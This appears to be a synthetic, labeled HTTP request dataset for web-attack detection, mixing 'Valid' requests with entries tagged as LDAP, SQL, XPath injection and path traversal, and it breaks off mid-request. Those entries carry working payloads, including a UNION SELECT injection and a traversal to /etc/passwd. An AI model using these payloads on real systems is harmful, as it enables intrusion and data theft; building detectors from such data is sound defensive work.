Transfer-Encoding: gzip
Warning: 997 208.8.7.32:24 "H4ott" "Sun, 14 Mar 04 08:06:29 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dafuehhs1n2=h r&anaCe4a8eator=a/S8iSe/a/child::node()[position()=48]    or    'vsnf'   =   '&pMGw8unionDqOtKD=uOk&t1eTnHj3Si9h=777862

End - Id: 48531
Start - Id: 19430
class: Valid
GET /atice0roeoal6e71iTcn/Flip5htoz/aqKBA37tW@g/w3e68ki/idowsxdscytEse/ulss9t2/ge/3fUmpQW/IollrsfaSMOh.html?cied5hpf=likelEs6hmq HTTP/1.0
Host: www.eougbswznE.be:73
Connection: ndaayale
Accept: */*;q=0.2
Accept-Charset: utf-8, koi8
Accept-Encoding: 
Accept-Language: ctp-s4qEyfy;q=0.0, leaP-rohnci;q=0.9, sn-vnlhpcrh;q=0.0, nrssAe-zcuo, Imus-nr
Cache-Control: no-cache
Client-ip: 168.104.135.23
Cookie: opnrnehmoooeSh=d1;Jn9Eprpasswda=s@P1-JuM3J
Cookie2: $Version="62"
Date: Sat, 04 Oct 08 13:53:19 GMT
ETag: "XSqNFsTYOL9p3v-0N"
Expect: ii4Il=cr9ndt;ddle7
From: t3oorme8@tdteu5l3.it
If-Modified-Since: Thu, 15 Oct 09 23:44:07 UTC
If-Unmodified-Since: Sun, 13 May 07 18:20:54 UTC
If-Match: *
If-None-Match: "FS7rZHGquO@OAcP5eop"
If-Range: Tue, 27 Mar 07 18:01:58 CET
Max-Forwards: 96
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZGlhaUwyaG50aWxUczdoOWVsdGFmaGpmdGFvb2xiUzlaYWR0dE9sOXR0
Authorization: oegead hliub=inmlxs
Range: -2,6-20086
Referer: /sldWp/Raoet/btOEu/tnu9rrae/fncTryto.asmx
TE: deflate,trailers,trailers
Trailer: Date
User-Agent: nolostziowohiidt2
UA-CPU: x86
UA-Disp: 984,861,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6070x723
Via: 9.9 www.UAdrz.htm, 1.4 www.egpslet1.html, 7.4 www.pl3zf.htm
Transfer-Encoding: identity
Upgrade: 3tDr/0.3, octa/6.4
Warning: 817 www.dgMhdl.css "coacOilhor" 
X-Forwarded-For: 6.252.77.179
X-Serial-Number: 31641026520148
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19430
Start - Id: 22153
class: Valid
GET /z@SAR/thzzIIyL7IA4yoLpF/ennliscGo/wwEk5ZVwu/bBia6/l-AwVPsgariVDA.FA/ian0awcfS5ltsm3/zeeeKsxI3fRtfnl/51BfONR9lMTFxUjn/ponoEe8/B7kTX-homeYEH2UVSd.swf?ltoeraa7ajthu=73&7h5j=tudowatwibBsdnteda&wpboqeveNwRrdh2=uerelsi&imgWB76tVEaK1S=u2ny3ntaksttt54yer&risqeoxgio2h=f%26rntvse%3Bceetts&8eeCirweHo=9Lstsiosltdig HTTP/1.1
Host: www.eziya.ch
Connection: uefn4
Accept: video/*, video/*, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: u0-n;q=0.5, rEihya-arn, tmuTl-a;q=0.1, oy-iz2na;q=0.3
Cache-Control: no-cache
Client-ip: 75.214.220.82
Cookie: AeiFstmaaths=Lis;eer70=tmp4xhuf2or]rp[twp-a;atitsln2n=28963789
Cookie2: $Version="7"
Date: Thu, 28 Feb 08 22:56:53 CET
ETag: W/"x0nw.1q1-Yd0rJb7-HAp"
Expect: 100-continue
From: aRiniz@oyso0ono.st
If-Modified-Since: Wed, 18 May 05 04:40:53 UTC
If-Unmodified-Since: Wed, 16 Sep 09 06:27:30 GMT
If-Match: "wph-IrtkyAZ961TN7KJ5"
If-None-Match: *
If-Range: Mon, 27 Jun 05 10:24:31 GMT
Max-Forwards: 4941
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic c3NpaTp0bGRxNWdl
Authorization: f5eb7h mnsghn=ixyTee
Range: 54-90
Referer: /nyEopr/gesmdn.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: YmTamli4 (nIXyXpU8)
UA-CPU: x86
UA-Disp: 6301,2233,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 829x0531
Via: 3.3 www.NSiajc.shtml
Transfer-Encoding: deflate
Upgrade: ss5tr/5.9
Warning: 917 www.soeSgapr.css "c5leeikhcoalpeot4" 
X-Forwarded-For: 77.46.33.144
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22153
Start - Id: 11982
class: Valid
GET /96MP/dP@iHrB/g3@ki_Og.jpeg?rtbrodfBosrW=esardivlhPeetuo%3Dwn%24&ananpaqlpsh=a5nrmSr%3Arnmm&0d8irC=Oti%3Aa&Io5n8W=MuaEinrIhii2t&AhaugrohGsro=3771949109&gsz=dkN&hwQa=cmdeaornetcatg%7Euttole&ettsDaeHeoa=aeu7nimAe+&vWLScJeE@=tie&hhn6uy=s71UZlk6i3Sm&7cee5elrsno5re=t&e0irT=zstitfn%40%24&taatlsePAoe=0tfhzos&maassnlit=%5Dcathztdfhtpassbl HTTP/1.0
Host: www.cl24iq.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, koi8, x-mac-japanese;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 234.22.80.103
Cookie: oilneeu=11315251;anor5Ye0gD4rwc=z;tetcehf6ieamu=lsn;tnnuruirtpekr=14;ygmd=suKL7o-ntx;e1tezsnsdnBEn0o=nl1i
Cookie2: $Version="042"
Date: Thu, 15 Nov 07 03:34:08 CET
ETag: "azk_rN20wtoPDiQA8P"
Expect: 100-continue
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Wed, 17 Mar 04 01:13:26 CET
If-Unmodified-Since: Mon, 26 Sep 05 24:23:03 CET
If-Match: "xMW0st63L3-kMmVRZk"
If-None-Match: "PRGTjcPVB_fvrn5N3Vd2"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.7
Pragma: lto=n
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: uviq oqbaptww=h2ha
Range: 9-,78403-
Referer: http://oekvmtt.org/8dHT.txt
TE: trailers,trailers,deflate
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 3.8; hm-3t; rv:0.8.6) Gecko/92383072
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 630x5808
Via: tooRs/9.1 89.79.20.2:7029, FTP/2.2 www.oieMetmi.shtml:0, 4.1 79.117.202.209
Transfer-Encoding: compress
Upgrade: ia1c/2.8, mur/1.2, susnSi/2.8, tteid/2.7, nnese/5.9
Warning: 586 242.0.8.135 "mecdtsDa" "Mon, 12 Feb 07 06:11:16 GMT"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11982
Start - Id: 21794
class: Valid
GET /eNrRuETD9R/eQl_HeVT/i-ut4i/s9pfFqnph-4j0/EIJvcKcmdscriptk7/otoinvihciSgqetnN.png?nieewinN6Whre=3eurndyThm&tareoeea=2phtpasstttirktfe&3jv2MeRt=+7ie3&mr393e=T6%3Dc&lt6aeTkihm=dLl%7Eaa&o65etcl=lpyq+&qoh4Tlfj=73&2e0p=vbscript&duschcgy=qnhdmDK_6&1Ds-_KyIlY=ciaent HTTP/1.0
Host: www.adeROneAdB.org
Connection: ykct6
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: du-s;q=0.3, 8prmds-nAeek
Cache-Control: only-if-cached
Client-ip: 108.137.224.81
Cookie: Itb=t3&ahwem F bo6a;7ct=9881092
Cookie2: $Version="9"
Date: Thu, 27 Aug 09 04:29:21 UTC
ETag: "bAa0I74X17.9.CWX5-R"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Thu, 01 Apr 04 12:53:03 GMT
If-Unmodified-Since: Tue, 20 Mar 07 01:26:15 UTC
If-Match: "7_nvIDP0oPbAM74"
If-None-Match: *
If-Range: *
Max-Forwards: 650
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: hqtl tth8p=pmsdc
Range: -6711
Referer: /hnrdIx/yicuhxee/rhto1ad/etel.asp
TE: deflate;q=0.6,gzip;q=0.8,gzip
Trailer: Connection
User-Agent: aadctR (nZDTn9; dkAVjqII; nonZl86P; nTx.uh)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9055x3634
Via: HTTP/9.3 157.97.151.157:7341, FTP/5.5 149.68.190.121
Transfer-Encoding: deflate
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 7990141764412
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21794
Start - Id: 37648
class: LdapInjection
POST /uhtta/@qTU/4k_0coO2SnNbjydJe/oiitaysardirEhnea/0dyZ88uStn2jn/_9objectU77ZPsxLXK/sIcUFbtT/ametzo/aoOx.html? HTTP/1.0
Content-Length: 119
Content-Language: rt
Content-Encoding: identity
Content-Location: /qrah/mhnp/onueeqei/e5te.mdb
Content-MD5: bnRlYWVmQ25jaW9lOTVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 May 07 23:26:28 CET
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 195.106.51.211
Connection: oilixd
Accept: image/*;q=0.4, image/jpeg, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: cnsmoMo-9br;q=0.4
Cache-Control: max-age=8
Client-ip: 76.236.29.239
Cookie: ett=Ail'8e<ombR
Cookie2: $Version="126"
Date: Sat, 04 Mar 06 06:15:00 GMT
ETag: "5CsxZ0n_JYvh4GoyRbX"
Expect: 100-continue
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: *
If-None-Match: "aVRrc@ly1pL@Byi_bY5"
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 3
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /ahripa/rurodhr/9innl.avi
TE: chunked
Trailer: TE
User-Agent: Mozilla/0.5 (Windows; U; Win98 4.7; ec-ai; rv:6.5.6) Gecko/51070970
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 6.3 www.ixees.html
Transfer-Encoding: gzip
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

seBfa=33414256&ats38euurancse=)(|(   cn=*o  'brien*)(mail =*o    'brien*   )  &o-6olU@x=tceoseysg

End - Id: 37648
Start - Id: 41934
class: SqlInjection
GET /aN8.htm?oldeeSe4nXer=27&40aekofsip=77224156&li=%27%29++++UNION+++ALL++++SELECT+++++mn1ia+%2C++aeqben++++%2C++++nnns++FROM++ago6rhmcc8++++WHERE+++diTs++++NOT+IN++++%28%27s1csd%27++++%29+++++AND+0oemeiT6s+++NOT+++IN++++%28++%27s0oamlkf%27++%29+++AND++%27%27++%3D++++%27 HTTP/1.1
Host: www.hunrnia.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Thu, 29 Jan 09 12:15:12 UTC
ETag: W/"fVRjw.c9SadJ-A7LI2u"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 08 Jul 04 04:43:54 GMT
If-Unmodified-Since: Wed, 10 Dec 08 21:36:51 GMT
If-Match: "h1xAaJiYOZdWVdq"
If-None-Match: *
If-Range: Thu, 08 Jun 06 19:55:45 UTC
Max-Forwards: 64
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: http://www.itxHUeS.de/niih.cgi
TE: gzip;q=0.3,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: djxdHHGg http://www.nau3m.biz
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: compress
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 462 www.ar0wo.html:0419 "fs8sanrnenlrm" 
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41934
Start - Id: 2121
class: Valid
GET /7wbbnomsnoTe/oj6M/t5sZ/e.bsgyS5MWAZr@vnaU/dfLY.7jBId/y.Born-MY1o9/eiuns@mMs9tqcYa2-Ux/rVp_7@V_BFlhb@Vz/eng3/jFem1nWxToJRYlr/i4Qm/jd6csxomorrt.jpeg?h2ew7o2patie=4912 HTTP/1.0
Host: www.we2n93tduM.de:5103
Connection: close
Accept: image/jpeg, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 237.9.247.14
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Thu, 16 Jul 09 12:25:05 UTC
ETag: W/"PkiXyIMVpqvo_R_eDskr"
Expect: aashide
From: thewc8@yzaulcn6.org
If-Modified-Since: Mon, 12 Dec 05 03:52:07 CET
If-Unmodified-Since: Tue, 26 Jul 05 09:57:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest username="slkrrtja"
Range: 9797-
Referer: /dDAiuh3/skyqy/heem1s4h.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 9.4; ej-et; rv:0.8.3) Gecko/07773492
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 539x1521
Via: 7.3 239.109.228.106
Transfer-Encoding: muqaad
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 86831
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2121
Start - Id: 34734
class: Valid
PUT /hCLBNCf.a/rqKJW@eFiiCl/sVFcM1/7JHo.2dxA/oastp2/access_logCQexecMQ5VQd84xZ6/qc_g/smA/r-/eQxD6CTASduyx8.cgi? HTTP/1.1
Content-Length: 10
Content-Language: lhxtoAv,aot
Content-Encoding: identity
Content-Location: /2tiies/tshTi/shndoce/gtEuhra.doc
Content-MD5: bnlhaHU0ZVB0ZWhnYmdhaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jan 07 23:45:46 CET
Last-Modified: Wed, 03 Mar 04 10:45:10 GMT
Host: www.ndq4aqis.com
Connection: close
Accept: application/*, application/zip;q=0.1, image/png
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: bbfhr-eoame;q=0.8, sprni-iRy;q=0.9, nGn-ciE, Wtoitid-owZdo8;q=0.0, s-paSaN;q=0.7
Cache-Control: only-if-cached
Client-ip: 88.239.129.138
Cookie: gZ.yAZ=tt90aagsulm
Cookie2: $Version="00"
Date: Sun, 03 Jul 05 01:23:51 UTC
ETag: W/"Iz45tQdos-SmJRa-"
Expect: 1OoriA
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Sun, 22 Jul 07 05:24:18 CET
If-Unmodified-Since: Thu, 29 Jan 04 08:00:08 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Jul 09 03:32:51 UTC
Max-Forwards: 922
MIME-Version: 4.5
Pragma: iaid='jqzsStt'
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: NTLM c3l5bnRpTGNxZWQ4TndGdVRtZXNBbzI3cmFydGV0ZDd5b2Q4dWVvZW8=
Range: -95,-112971
Referer: http://www.hptrhn.gov/otay/onrNt8/5lxUdret/ehagNHyx/eEifs0qc.html
TE: trailers,chunked,gzip;q=0.3
Trailer: TE
User-Agent: yrqerDtrta/5.3
UA-CPU: x86
UA-Disp: 366,3998,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 420x8395
Via: HTTP/1.4 www.arnedTa.jpg, 6.3 www.anrs.jpg:40690, gwi/4.9 www.nceewIa.js
Transfer-Encoding: a2li
Upgrade: btCas3/7.1
Warning: 037 www.hherAoqh.shtml "Nsboaotl5osqnnpngxrn" "Fri, 28 Aug 09 18:01:13 GMT"
X-Forwarded-For: 66.86.162.41
X-Serial-Number: 8267769973
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

tyr4cda=ze

End - Id: 34734
Start - Id: 1283
class: Valid
GET /oYvJfNNxHnEusU@/7b.J@asyx8cV4ASc.tZe/wXOUEXrPbn/n3ywWJJrltbYG/hjdgoslhoh/nTee/EimgfZ6.F/tgcvQ8rdlX25T/vqZcpBFTBjX/msd/ssT/oall5frP6TY.png?Ieenac2r8v2Eri=oafezdmchda&dnrTux3lins=3doonn1e&id=fbl&sh=EiIs&aetetbhe=sba&3LciR=69&ooaaitnT=fe%3CStrl&nptajrdefn=1&w1h8frttsrh3noa=41&ao=+4eLiwDnph-g&iolaegihtef5=s01ph&obfoaso=008517&listeup4=nullrnopensan&ogij=osaroomNbieemi8b&oazttukaueyepw=93300148 HTTP/1.1
Host: 42.6.203.225:5705
Connection: 7muotni
Accept: text/*, video/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=01
Client-ip: 240.105.33.206
Cookie: rrtwo5xdohed3s=740
Cookie2: $Version="019"
Date: Sat, 24 Jun 06 18:32:20 CET
ETag: W/"OBfKsTIJ9zsshyG"
Expect: 100-continue
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Mon, 09 Mar 09 01:06:00 CET
If-Unmodified-Since: Tue, 01 May 07 05:38:45 GMT
If-Match: "j3zhLTPKauDk--@noA@a"
If-None-Match: "LOM7P6_4prd90kLS5jRB"
If-Range: "xVoAiLKqm@5aYPY8"
Max-Forwards: 3
MIME-Version: 7.7
Pragma: fc=lrler7b
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM cnM4blREb2FvaWRqc3BvNW9ubGFQTWNzZW5hZVNscmF1ZWtzaGxwaHQwYWJ0ZTVz
Range: 282-,2-77614,032140-
Referer: http://ihgy1hB.ch/Anebnfs/iyTexz8/efEjnio/tuji/tgmsit.tiff
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.5 (X11; U; Linux i386 1.6; u3-nb; rv:5.9.0) Gecko/80603624
UA-CPU: PowerPC
UA-Disp: 893,913,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7486x696
Via: FTP/5.6 127.17.133.65
Transfer-Encoding: deflate
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 247.175.0.48
X-Serial-Number: 794730
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1283
Start - Id: 13124
class: Valid
GET /nAneham9yHRw/ee7gjtbv5/S3Y/ePnUdN7FZpEZmZrO1nD/fSpMt7dV0aJ7/iViZl-ldiQb_r.aspx?Ycn6=879700&aigeeaoe=4639&aoWya=on9F8x8&gi5egehfs2otg=i1D6j&uwaztgqe=lhl5aj2tAi%3EwnQ%5Cl&oscqieuk=mi+Wt&sot8nywrho=ttrirusp HTTP/1.1
Host: 39.40.87.49
Connection: close
Accept: audio/*;q=0.7, text/*;q=0.8, video/*;q=0.1
Accept-Charset: cp-950;q=0.7, x-mac-turkish;q=0.1, koi8, iso-8859-15
Accept-Encoding: deflate, deflate
Accept-Language: sm8th-t;q=0.9, 8nzh5-q;q=0.1, idsat-brctom, lessrxd-m2aC;q=0.1
Cache-Control: no-store
Client-ip: 66.218.255.12
Cookie: zud=E>e ary;a5atuAl9ys=5;TndUnao44t=405;nlpyilvyrEa=ic-bcgS;wgmPfB6H0object=hoo7zLr8
Cookie2: $Version="578"
Date: Thu, 05 Feb 04 02:14:02 GMT
ETag: "EZnUQu-V3qHKvOtWYS"
Expect: 100-continue
From: is6go@wrALo.uk
If-Modified-Since: Sat, 04 Jun 05 12:21:43 GMT
If-Unmodified-Since: Sat, 08 May 04 23:36:59 GMT
If-Match: *
If-None-Match: "XtcVE09QFPpAhcCJUNzj"
If-Range: Wed, 02 Aug 06 22:52:23 GMT
Max-Forwards: 512
MIME-Version: 9.3
Pragma: hvs=o
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Digest nonce
Range: 3154-34,666990-,28905-7
Referer: /haiabr/cimhh/eeHe/cwia/uon2Eeid.gz
TE: trailers
Trailer: Warning
User-Agent: Mozilla/1.9 (X11; U; SunOS sun4u 4.7; N5-jz; rv:3.6.4) Gecko/37103327
UA-CPU: Sparc
UA-Disp: 107,146,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: HTTP/0.6 www.unkwi.jpeg, 2.2 www.hryetnn.png
Transfer-Encoding: identity
Upgrade: OaV8e/8.3, zndhh/8.1, ikcan/5.6, i2rii/5.8, 4ue/8.0
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 6109336510742510
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13124
Start - Id: 36366
class: PathTransversal
GET /Haiefis/o7.kmUsp6@.dz6GY.sh?ptgam8Nk7l=5229959&SlocationafDmochawhereo-gS=34282&4hmowaemihlis=bt&enaajh9dnrog65=aSVLTb&b9pIoA-_phttpg=hlogindf&ypeiObaq7tan=e&e_b0qR8MTXhH=wewweN2oatmh&dpavnU=rgvrtq1tirqn&zeiwltal=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&isa7uspaalapio=9x&eWWdroppB=+openy&unH=%29l&zudnybntigp4sir=ayo8FLqB&position0C5d=ann HTTP/1.0
Host: www.JlhlnY1s.be:77886
Connection: hnslHR5r
Accept: */*;q=0.1
Accept-Charset: x-mac-hebrew;q=0.1, iso-8859-8;q=0.7, utf-8, iso-10646-ucs-2;q=0.1, x-mac-roman;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 19.106.218.100
Cookie: Zmetad9N3ngg=yOMAc1ssg;lohnkisdif=igF;rsaft4otiu9iga=dnee;rw1tefssr=h4_q_oQiG1q;XncQ2cE=\f 'o;senEt=n19
Cookie2: $Version="09"
Date: Thu, 07 Jul 05 12:16:51 UTC
If-Modified-Since: Tue, 07 Feb 06 18:53:37 CET
If-Unmodified-Since: Sun, 13 Nov 05 11:07:16 UTC
If-Match: *
If-None-Match: "y1lqHipScwAWmmXK3WN."
If-Range: "EHTH6Uo7iPx7W8RuV"
Max-Forwards: 4
MIME-Version: 2.9
Pragma: u3oi='i'
Authorization: rraoiq yszdnbe=SEvzf
Range: -184,-23118,-675
Referer: http://tond.de/T4tu/ytMzo.msf
Trailer: If-Modified-Since
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 0.3; 21-ie; rv:3.7.3) Gecko/77864563
Transfer-Encoding: gzip
Warning: 827 www.ec8sfnel.jpeg "rEAhcthwet" "Wed, 03 Mar 04 14:54:08 UTC"
X-Serial-Number: 29276576437166618904
----: ----------

null

End - Id: 36366
Start - Id: 27789
class: Valid
GET /FFgo/eW/eTuSY/rcef4NtvF6eJaPQgWade/wckphrtpohgdsittwe6O/rrted/oiYmTuAnM3Dt36V/i0/enWunnrii/shuytattiFd/thttps/sV4TU72ZT-K_1.css? HTTP/1.1
Host: www.os6ld.cz:80
Connection: close
Accept: video/mpeg;q=0.9, text/plain, application/*
Accept-Charset: x-mac-ce, cp-936;q=0.6, iso-8859-4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: Lup=rah2ns
Client-ip: 170.250.103.182
Cookie: 5osfEj8= ;dhmt=O ;_Iufa.W8=rborE
Cookie2: $Version="9"
Date: Sun, 24 Apr 05 05:27:20 UTC
ETag: "asqnX8rt1Izz8FLv-"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Thu, 09 Dec 04 21:51:23 CET
If-Unmodified-Since: Wed, 15 Jun 05 16:24:41 GMT
If-Match: *
If-None-Match: "ZnNYGzaA@rYdPrghAD7O"
If-Range: *
Max-Forwards: 1594
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: Basic dWx4YWg6YnpuYTI=
Range: -83593,-88
Referer: /euanoeo/oits/siJiu/tuaaz4Lt.fgf
TE: trailers
Trailer: TE
User-Agent: aam0N/4.0.6.4
UA-CPU: x86
UA-Disp: 966,647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8432x1397
Via: HTTP/6.3 134.235.202.89, 8.5 www.w2oea.htm
Transfer-Encoding: compress
Upgrade: dieesm/2.6
Warning: 915 www.tluon.jpeg:326 "rrne4fWsouns" 
X-Forwarded-For: 90.82.25.41
X-Serial-Number: 00771445760189664084
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27789
Start - Id: 49251
class: XPathInjection
GET /nhetfICbdeiut/kJxtDr.aspx?7eawhrdTxieo=83737&bra6lotif7it=20&AQozQpasswdY5JgPi=yghh+tPhheeH&Ol9mt=yinclude7lhrkut&l@-4alltmpPmochaR=ehItseor%2F7a&8cwSccio=j%5Cejrwctncoc&rnnso98DDhtsa=igtshotAr6edesm&bpnfiueui=1341&KrH7TSLue=tfskhnltej&Ecqhfuea=81815&RdEo1=%28i++%3C++++count%28teowdo%2Fchild%3A%3Atext%28%29%29+++++and+++j+%3C+++++count%28hkhga5%2Fchild%3A%3Acomment%28%29%29+++and+++k++++%3C++++count%28ual1o%2Fchild%3A%3A*%29++++%29&LgeEi=2&TbCrFadJ=Nsnec&om=1tdhlSb3rnpeaA+&ieSnldJotdxue=ei%25t0ls8 HTTP/1.0
Host: 31.94.95.208:80
Connection: close
Accept: image/*;q=0.3, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 247.83.20.197
Cookie: ialhhecnt=Enietcm|erp~positionzz;ic=24;pouydioiZr=12214
Cookie2: $Version="1"
Date: Sat, 02 Oct 04 18:54:39 UTC
ETag: "H1R.iGgL4UA_bh.Cb"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Wed, 26 Aug 09 18:04:51 GMT
If-Unmodified-Since: Thu, 22 Sep 05 14:28:41 GMT
If-Match: "tZXkh0sCyFSDPr84vg"
If-None-Match: *
If-Range: Wed, 25 Oct 06 07:43:47 UTC
Max-Forwards: 146
MIME-Version: 6.6
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: heharo yrwit=gu7eRuno
Range: 673-,-741678,577-
Referer: http://www.trTgee.ch/Rthiteoi/bem2/hekuyshn.swf
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 5.6; de-ey; rv:9.5.2) Gecko/43632300
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
